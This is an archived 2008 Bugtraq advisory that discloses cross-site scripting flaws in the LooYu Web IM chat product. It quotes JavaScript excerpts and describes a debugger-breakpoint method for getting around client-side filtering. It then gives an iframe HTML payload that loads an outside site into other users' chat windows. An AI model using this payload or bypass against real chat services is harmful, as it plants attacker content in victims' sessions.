lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 19 Sep 2008 14:52:35 +0800
From: xsp <xisigr@...il.com>
To: bugtraq@...urityfocus.com
Subject: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities

Application: LooYu Web IM
Vendor: www.looyu.com
Corporation: DuoYou, Inc.
Version: Latest: (19 SEP 2008) - Home Edition, Enterprise & Professional
Description: LooYu Web IM 2008 Cross-Site Scripting Vulnerabilities

Background:
==============
LooYu is a web-based group chat tool that lets invite a client,
colleague, or vendor to chat, and collaborate.

Vulnerability:
==============
They do not properly sanitize the potentially malicious input content
to be rendered and, as a result, an attacker might provide malicious
HTML content as part of an IM message. There is a client-side only
input validation.

Exploit:
==============
1. newVisitorChat.js

(1)function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
}

(2)function save_message(msg) {
	var m = msg;                          //BREAKPOINT
	for(var e in emots){
    	if(m.indexOf(e)!=-1){    	
    		m = m.replace(e,emots[e]);       			
    	}

    }
    addMsg_chat(m, "you"/*getShortId(visitorId)*/, "visitor",null,'send');
    ..................
    ..................
}
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"


2. newCusChat.js

(1)function sendMessage() {
    ..................
    ..................
    save_message(replaceHtml(msg));
    ..................
    ..................
 }

(2)function saveMessage(msg) {
     showLocalMessage(msg);
     Chat.addMessage(companyId,currentVisitor.chatId,customerId,currentVisitor.getTar(),
msg,{callback:function(m){
     save_message_do(currentVisitor,m);              //BREAKPOINT
     }});
    }
SET BREAKPOINT(firebug, etc), AND SET NEW VALUE:
msg = "<iframe width=800 height=600 src='htTP://WWW.G.CN'></iframe>"

=========================
xisigr[topsec]
xisigr@...il.com



-- 
----xisigr----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ